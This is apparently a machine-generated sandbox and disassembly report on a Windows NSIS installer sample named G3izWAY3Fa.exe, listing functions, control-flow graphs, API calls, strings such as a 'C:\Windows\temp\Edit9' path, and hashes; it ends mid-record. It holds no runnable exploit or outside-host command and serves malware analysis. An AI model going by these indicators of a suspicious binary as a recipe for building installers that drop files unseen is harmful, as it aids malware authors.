                                • Opcode Fuzzy Hash: dac8a3e4b42874552ff3bf8d63fabb06b1ed44114a57f908459e075a30442c4d
                                • Instruction Fuzzy Hash: 9691B170A08340AED7216F619D49B6B7EACEB0530AF44047FF581B62D2C77C9E458B6E
                                Function 00405FA8 Relevance: 5.4, APIs: 4, Instructions: 382COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 405 405fa8-405fad 406 40601e-40603c 405->406 407 405faf-405fde 405->407 408 406614-406629 406->408 409 405fe0-405fe3 407->409 410 405fe5-405fe9 407->410 412 406643-406659 408->412 413 40662b-406641 408->413 411 405ff5-405ff8 409->411 414 405ff1 410->414 415 405feb-405fef 410->415 417 406016-406019 411->417 418 405ffa-406003 411->418 416 40665c-406663 412->416 413->416 414->411 415->411 419 406665-406669 416->419 420 40668a-406696 416->420 423 4061eb-406209 417->423 421 406005 418->421 422 406008-406014 418->422 426 406818-406822 419->426 427 40666f-406687 419->427 432 405e2c-405e35 420->432 421->422 429 40607e-4060ac 422->429 424 406221-406233 423->424 425 40620b-40621f 423->425 431 406236-406240 424->431 425->431 430 40682e-406841 426->430 427->420 433 4060c8-4060e2 429->433 434 4060ae-4060c6 429->434 440 406846-40684a 430->440 436 406242 431->436 437 4061e3-4061e9 431->437 438 406843 432->438 439 405e3b 432->439 435 4060e5-4060ef 433->435 434->435 442 4060f5 435->442 443 406066-40606c 435->443 444 406353-406360 436->444 445 4061be-4061c2 436->445 437->423 441 406187-406191 437->441 438->440 446 405e42-405e46 439->446 447 405f82-405fa3 439->447 448 405ee7-405eeb 439->448 449 405f57-405f5b 439->449 456 4067d6-4067e0 441->456 457 406197-4061b9 441->457 468 4067b2-4067bc 442->468 469 40604b-406063 442->469 458 406072-406078 443->458 459 40611f-406125 443->459 444->432 460 4063af-4063be 444->460 461 4061c8-4061e0 445->461 462 4067ca-4067d4 445->462 446->430 453 405e4c-405e59 446->453 447->408 451 405ef1-405f0a 448->451 452 406797-4067a1 448->452 454 405f61-405f75 449->454 455 4067a6-4067b0 449->455 463 405f0d-405f11 451->463 452->430 453->438 467 405e5f-405ea5 453->467 466 405f78-405f80 454->466 455->430 456->430 457->444 458->429 464 406183 458->464 459->464 465 406127-406145 459->465 460->408 461->437 462->430 463->448 470 405f13-405f19 463->470 464->441 471 406147-40615b 465->471 472 40615d-40616f 465->472 466->447 466->449 473 405ea7-405eab 467->473 474 405ecd-405ecf 467->474 468->430 469->443 475 405f43-405f55 470->475 476 405f1b-405f22 470->476 477 406172-40617c 471->477 472->477 478 405eb6-405ec4 GlobalAlloc 473->478 479 405ead-405eb0 GlobalFree 473->479 480 405ed1-405edb 474->480 481 405edd-405ee5 474->481 475->466 482 405f24-405f27 GlobalFree 476->482 483 405f2d-405f3d GlobalAlloc 476->483 477->459 484 40617e 477->484 478->438 485 405eca 478->485 479->478 480->480 480->481 481->463 482->483 483->438 483->475 487 406104-40611c 484->487 488 4067be-4067c8 484->488 485->474 487->459 488->430
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID:
                                • String ID:
                                • API String ID:
                                • Opcode ID: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                • Instruction ID: ffbedf2a53f09e030cb941e21afd419a8c3069ec791793070072d3341ca218b9
                                • Opcode Fuzzy Hash: 9b666163c1661dbd9b8a2e81cbf380ba9933516b4cb578f4d51b52d9bda143bb
                                • Instruction Fuzzy Hash: 17F16571D00229CBCF28CFA8C8946ADBBB1FF44305F25856ED856BB281D7785A86CF44
                                Function 00405CFF Relevance: 4.5, APIs: 3, Instructions: 20libraryloaderCOMMON
                                Download Yara Rule
                                APIs
                                • GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                • LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                • GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: AddressHandleLibraryLoadModuleProc
                                • String ID:
                                • API String ID: 310444273-0
                                • Opcode ID: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                • Instruction ID: d69b72dbe4010a9b48e4a262f362438d38f190b8a9031efe6831075815a54aa0
                                • Opcode Fuzzy Hash: 7acfb344228b968400b962badda7c36266698eee5c55508006b44164a923ef80
                                • Instruction Fuzzy Hash: 5DE08C32A04610BBD3215B20AE0896B73A8EED9B403004C7EF615F6251D734AC11DBBA
                                Function 00403526 Relevance: 51.0, APIs: 15, Strings: 14, Instructions: 216stringregistrylibraryCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 106 403526-40353e call 405cff 109 403540-403550 call 40593b 106->109 110 403552-403579 call 4058c4 106->110 119 40359c-4035c5 call 4037ef call 4055b1 109->119 115 403591-403597 lstrcatA 110->115 116 40357b-40358c call 4058c4 110->116 115->119 116->115 124 4035cb-4035d0 119->124 125 40364c-403654 call 4055b1 119->125 124->125 126 4035d2-4035f6 call 4058c4 124->126 131 403662-403687 LoadImageA 125->131 132 403656-40365d call 4059ff 125->132 126->125 133 4035f8-4035fa 126->133 135 403716-40371e call 40140b 131->135 136 40368d-4036c3 RegisterClassA 131->136 132->131 137 40360b-403617 lstrlenA 133->137 138 4035fc-403609 call 4054fb 133->138 150 403720-403723 135->150 151 403728-403733 call 4037ef 135->151 139 4037e5 136->139 140 4036c9-403711 SystemParametersInfoA CreateWindowExA 136->140 144 403619-403627 lstrcmpiA 137->144 145 40363f-403647 call 4054d0 call 4059dd 137->145 138->137 142 4037e7-4037ee 139->142 140->135 144->145 149 403629-403633 GetFileAttributesA 144->149 145->125 154 403635-403637 149->154 155 403639-40363a call 405517 149->155 150->142 159 403739-403756 ShowWindow LoadLibraryA 151->159 160 4037bc-4037c4 call 404e4d 151->160 154->145 154->155 155->145 161 403758-40375d LoadLibraryA 159->161 162 40375f-403771 GetClassInfoA 159->162 168 4037c6-4037cc 160->168 169 4037de-4037e0 call 40140b 160->169 161->162 164 403773-403783 GetClassInfoA RegisterClassA 162->164 165 403789-4037ba DialogBoxParamA call 40140b call 403476 162->165 164->165 165->142 168->150 170 4037d2-4037d9 call 40140b 168->170 169->139 170->150
                                APIs
                                  • Part of subcall function 00405CFF: GetModuleHandleA.KERNEL32(?,?,00000000,0040310E,00000008), ref: 00405D11
                                  • Part of subcall function 00405CFF: LoadLibraryA.KERNELBASE(?,?,00000000,0040310E,00000008), ref: 00405D1C
                                  • Part of subcall function 00405CFF: GetProcAddress.KERNEL32(00000000,?), ref: 00405D2D
                                • lstrcatA.KERNEL32(1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000,C:\Users\user\AppData\Local\Temp\,00000000), ref: 00403597
                                • lstrlenA.KERNEL32(open C:\Windows\temp\Edit9,?,?,?,open C:\Windows\temp\Edit9,00000000,C:\Windows\temp,1033,00420478,80000001,Control Panel\Desktop\ResourceLocale,00000000,00420478,00000000,00000006,"C:\Users\user\Desktop\G3izWAY3Fa.exe"), ref: 0040360C
                                • lstrcmpiA.KERNEL32(?,.exe), ref: 0040361F
                                • GetFileAttributesA.KERNEL32(open C:\Windows\temp\Edit9), ref: 0040362A
                                • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Windows\temp), ref: 00403673
                                  • Part of subcall function 0040593B: wsprintfA.USER32 ref: 00405948
                                • RegisterClassA.USER32 ref: 004036BA
                                • SystemParametersInfoA.USER32(00000030,00000000,_Nb,00000000), ref: 004036D2
                                • CreateWindowExA.USER32(00000080,?,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 0040370B
                                • ShowWindow.USER32(00000005,00000000), ref: 00403741
                                • LoadLibraryA.KERNEL32(RichEd20), ref: 00403752
                                • LoadLibraryA.KERNEL32(RichEd32), ref: 0040375D
                                • GetClassInfoA.USER32(00000000,RichEdit20A,00423620), ref: 0040376D
                                • GetClassInfoA.USER32(00000000,RichEdit,00423620), ref: 0040377A
                                • RegisterClassA.USER32(00423620), ref: 00403783
                                • DialogBoxParamA.USER32(?,00000000,004038BC,00000000), ref: 004037A2
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: ClassLoad$InfoLibrary$RegisterWindow$AddressAttributesCreateDialogFileHandleImageModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                • String ID: 6B$"C:\Users\user\Desktop\G3izWAY3Fa.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Windows\temp$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb$open C:\Windows\temp\Edit9
                                • API String ID: 914957316-3617224747
                                • Opcode ID: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                • Instruction ID: 0f3f48bff709b167bb3a38cee6451da723a784a17f6d38f49bc0c0f1e25ee8dd
                                • Opcode Fuzzy Hash: ca5c191d662c2f1331136733af7cd9fb3c1208b0aa80a7c8f6e1579a7abb4d19
                                • Instruction Fuzzy Hash: 9261C5B1A04200BAD6206F659C45E3B3A6DE74474AF40453FF941B62E1D67D9E028B3E
                                Function 00402C22 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 182COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 177 402c22-402c70 GetTickCount GetModuleFileNameA call 4056b4 180 402c72-402c77 177->180 181 402c7c-402caa call 4059dd call 405517 call 4059dd GetFileSize 177->181 182 402e54-402e58 180->182 189 402cb0 181->189 190 402d97-402da5 call 402bbe 181->190 191 402cb5-402ccc 189->191 197 402da7-402daa 190->197 198 402dfa-402dff 190->198 193 402cd0-402cd2 call 40304e 191->193 194 402cce 191->194 201 402cd7-402cd9 193->201 194->193 199 402dac-402dc4 call 403080 call 40304e 197->199 200 402dce-402df8 GlobalAlloc call 403080 call 402e5b 197->200 198->182 199->198 223 402dc6-402dcc 199->223 200->198 228 402e0b-402e1c 200->228 203 402e01-402e09 call 402bbe 201->203 204 402cdf-402ce6 201->204 203->198 207 402d62-402d66 204->207 208 402ce8-402cfc call 405675 204->208 212 402d70-402d76 207->212 213 402d68-402d6f call 402bbe 207->213 208->212 226 402cfe-402d05 208->226 219 402d85-402d8f 212->219 220 402d78-402d82 call 405d6b 212->220 213->212 219->191 227 402d95 219->227 220->219 223->198 223->200 226->212 232 402d07-402d0e 226->232 227->190 229 402e24-402e29 228->229 230 402e1e 228->230 233 402e2a-402e30 229->233 230->229 232->212 234 402d10-402d17 232->234 233->233 235 402e32-402e4d SetFilePointer call 405675 233->235 234->212 236 402d19-402d20 234->236 239 402e52 235->239 236->212 238 402d22-402d42 236->238 238->198 240 402d48-402d4c 238->240 239->182 241 402d54-402d5c 240->241 242 402d4e-402d52 240->242 241->212 243 402d5e-402d60 241->243 242->227 242->241 243->212
                                APIs
                                • GetTickCount.KERNEL32 ref: 00402C33
                                • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\G3izWAY3Fa.exe,00000400), ref: 00402C4F
                                  • Part of subcall function 004056B4: GetFileAttributesA.KERNELBASE(00000003,00402C62,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 004056B8
                                  • Part of subcall function 004056B4: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004056DA
                                • GetFileSize.KERNEL32(00000000,00000000,0042B000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\G3izWAY3Fa.exe,C:\Users\user\Desktop\G3izWAY3Fa.exe,80000000,00000003), ref: 00402C9B
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: File$AttributesCountCreateModuleNameSizeTick
                                • String ID: "C:\Users\user\Desktop\G3izWAY3Fa.exe"$(pA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\G3izWAY3Fa.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                • API String ID: 4283519449-616736272
                                • Opcode ID: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
                                • Instruction ID: bb8333a86194dcf573844375b596ab0c7c07cd824b72df89bd2f0bbec4532e5a
                                • Opcode Fuzzy Hash: f0b155bb72d4673e8e2538c02c47e4f576f948850c8845f4e559d72db7119d93
                                • Instruction Fuzzy Hash: 21511971A00214ABDB209F65DE89B9E7BB4EF04319F10403BF904B62D1D7BC9E458BAD
                                Function 00401734 Relevance: 14.1, APIs: 5, Strings: 3, Instructions: 147stringtimeCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 244 401734-401757 call 4029f6 call 40553d 249 401761-401773 call 4059dd call 4054d0 lstrcatA 244->249 250 401759-40175f call 4059dd 244->250 255 401778-40177e call 405c3f 249->255 250->255 260 401783-401787 255->260 261 401789-401793 call 405cd8 260->261 262 4017ba-4017bd 260->262 269 4017a5-4017b7 261->269 270 401795-4017a3 CompareFileTime 261->270 264 4017c5-4017e1 call 4056b4 262->264 265 4017bf-4017c0 call 405695 262->265 272 4017e3-4017e6 264->272 273 401859-401882 call 404d7b call 402e5b 264->273 265->264 269->262 270->269 274 4017e8-40182a call 4059dd * 2 call 4059ff call 4059dd call 40529e 272->274 275 40183b-401845 call 404d7b 272->275 285 401884-401888 273->285 286 40188a-401896 SetFileTime 273->286 274->260 307 401830-401831 274->307 287 40184e-401854 275->287 285->286 290 40189c-4018a7 CloseHandle 285->290 286->290 291 402894 287->291 294 40288b-40288e 290->294 295 4018ad-4018b0 290->295 293 402896-40289a 291->293 294->291 297 4018b2-4018c3 call 4059ff lstrcatA 295->297 298 4018c5-4018c8 call 4059ff 295->298 304 4018cd-402213 call 40529e 297->304 298->304 304->293 311 40265c-402663 304->311 307->287 310 401833-401834 307->310 310->275 311->294
                                APIs
                                • lstrcatA.KERNEL32(00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 00401773
                                • CompareFileTime.KERNEL32(-00000014,?,open,open,00000000,00000000,open,C:\Windows\temp,00000000,00000000,00000031), ref: 0040179D
                                  • Part of subcall function 004059DD: lstrcpynA.KERNEL32(?,?,00000400,00403139,00423680,NSIS Error), ref: 004059EA
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000,?), ref: 00404DB4
                                  • Part of subcall function 00404D7B: lstrlenA.KERNEL32(00402F8B,0041FC50,00000000,0040F020,00000000,?,?,?,?,?,?,?,?,?,00402F8B,00000000), ref: 00404DC4
                                  • Part of subcall function 00404D7B: lstrcatA.KERNEL32(0041FC50,00402F8B,00402F8B,0041FC50,00000000,0040F020,00000000), ref: 00404DD7
                                  • Part of subcall function 00404D7B: SetWindowTextA.USER32(0041FC50,0041FC50), ref: 00404DE9
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00404E0F
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 00404E29
                                  • Part of subcall function 00404D7B: SendMessageA.USER32(?,00001013,?,00000000), ref: 00404E37
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                • String ID: C:\Windows\temp$open$open C:\Windows\temp\Edit9
                                • API String ID: 1941528284-3341607499
                                • Opcode ID: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
                                • Instruction ID: 7896ef4f757b45501086316f909c91b804aeab5b8a53035332c5850d51b772f7
                                • Opcode Fuzzy Hash: 19fc4884e146a1ae1ba978f5a010e4346a4a04167c84060e6bd2cb96d6f55c18
                                • Instruction Fuzzy Hash: FA41C272900615BACF10BBA5DD46EAF3A79EF01329B20433BF515F11E1D63C4A419AAD
                                Function 00402E5B Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 166fileCOMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 312 402e5b-402e6f 313 402e71 312->313 314 402e78-402e80 312->314 313->314 315 402e82 314->315 316 402e87-402e8c 314->316 315->316 317 402e9c-402ea9 call 40304e 316->317 318 402e8e-402e97 call 403080 316->318 322 402ff9 317->322 323 402eaf-402eb3 317->323 318->317 324 402ffb-402ffc 322->324 325 402fe2-402fe4 323->325 326 402eb9-402ed9 GetTickCount call 405dd9 323->326 327 403047-40304b 324->327 328 402fe6-402fe9 325->328 329 403039-40303d 325->329 337 403044 326->337 338 402edf-402ee7 326->338 334 402feb 328->334 335 402fee-402ff7 call 40304e 328->335 332 402ffe-403004 329->332 333 40303f 329->333 339 403006 332->339 340 403009-403017 call 40304e 332->340 333->337 334->335 335->322 345 403041 335->345 337->327 342 402ee9 338->342 343 402eec-402efa call 40304e 338->343 339->340 340->322 349 403019-40302c WriteFile 340->349 342->343 343->322 350 402f00-402f09 343->350 345->337 351 402fde-402fe0 349->351 352 40302e-403031 349->352 353 402f0f-402f2c call 405df9 350->353 351->324 352->351 354 403033-403036 352->354 357 402f32-402f49 GetTickCount 353->357 358 402fda-402fdc 353->358 354->329 359 402f4b-402f53 357->359 360 402f8e-402f92 357->360 358->324 363 402f55-402f59 359->363 364 402f5b-402f8b MulDiv wsprintfA call 404d7b 359->364 361 402f94-402f97 360->361 362 402fcf-402fd2 360->362 365 402fb7-402fbd 361->365 366 402f99-402fab WriteFile 361->366 362->338 367 402fd8 362->367 363->360 363->364 364->360 370 402fc3-402fc7 365->370 366->351 369 402fad-402fb0 366->369 367->337 369->351 372 402fb2-402fb5 369->372 370->353 373 402fcd 370->373 372->370 373->337
                                APIs
                                • GetTickCount.KERNEL32 ref: 00402EB9
                                • GetTickCount.KERNEL32 ref: 00402F3A
                                • MulDiv.KERNEL32(7FFFFFFF,00000064,00000020), ref: 00402F67
                                • wsprintfA.USER32 ref: 00402F77
                                • WriteFile.KERNELBASE(00000000,00000000,0040F020,00000000,00000000), ref: 00402FA3
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CountTick$FileWritewsprintf
                                • String ID: ... %d%%
                                • API String ID: 4209647438-2449383134
                                • Opcode ID: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                • Instruction ID: 77f196e3f4de2b0f7ff2a56d5fa3bb7e3b28ee40e2402e388f788a2720e93e15
                                • Opcode Fuzzy Hash: c92cbd3e3d4075a18ca6a835e36108bdbc166e0133a86f0c276232396de1e17b
                                • Instruction Fuzzy Hash: F151917190121A9BCF10CF55DA48AAF7B78AF04795F10413BF810B72C0D7B89E50DBAA
                                Function 004015B3 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 55COMMON
                                Download Yara Rule

                                Control-flow Graph

                                • Executed
                                • Not Executed
                                control_flow_graph 374 4015b3-4015c6 call 4029f6 call 405564 379 4015c8-4015e3 call 4054fb CreateDirectoryA 374->379 380 40160a-40160d 374->380 387 401600-401608 379->387 388 4015e5-4015f0 GetLastError 379->388 382 40162d-402169 call 401423 380->382 383 40160f-401628 call 401423 call 4059dd SetCurrentDirectoryA 380->383 395 40288b-40289a 382->395 383->395 387->379 387->380 393 4015f2-4015fb GetFileAttributesA 388->393 394 4015fd 388->394 393->387 393->394 394->387
                                APIs
                                  • Part of subcall function 00405564: CharNextA.USER32(00405316,?,00421880,00000000,004055C8,00421880,00421880,?,?,00000000,00405316,?,"C:\Users\user\Desktop\G3izWAY3Fa.exe",00000000), ref: 00405572
                                  • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405577
                                  • Part of subcall function 00405564: CharNextA.USER32(00000000), ref: 00405586
                                • CreateDirectoryA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015DB
                                • GetLastError.KERNEL32(?,00000000,0000005C,00000000,000000F0), ref: 004015E5
                                • GetFileAttributesA.KERNELBASE(00000000,?,00000000,0000005C,00000000,000000F0), ref: 004015F3
                                • SetCurrentDirectoryA.KERNELBASE(00000000,C:\Windows\temp,00000000,00000000,000000F0), ref: 00401622
                                Strings
                                Memory Dump Source
                                • Source File: 00000000.00000002.1383362055.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                • Associated: 00000000.00000002.1383290574.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383409107.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383451679.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000042C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000436000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000046C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                • Associated: 00000000.00000002.1383607810.000000000047E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_400000_G3izWAY3Fa.jbxd
                                Similarity
                                • API ID: CharNext$Directory$AttributesCreateCurrentErrorFileLast
                                • String ID: C:\Windows\temp
                                • API String ID: 3751793516-823764690
                                • Opcode ID: c26435dd92f2a1108dda5f18212d644254b55bfd3cfdadd86ae1b21390b81dbb
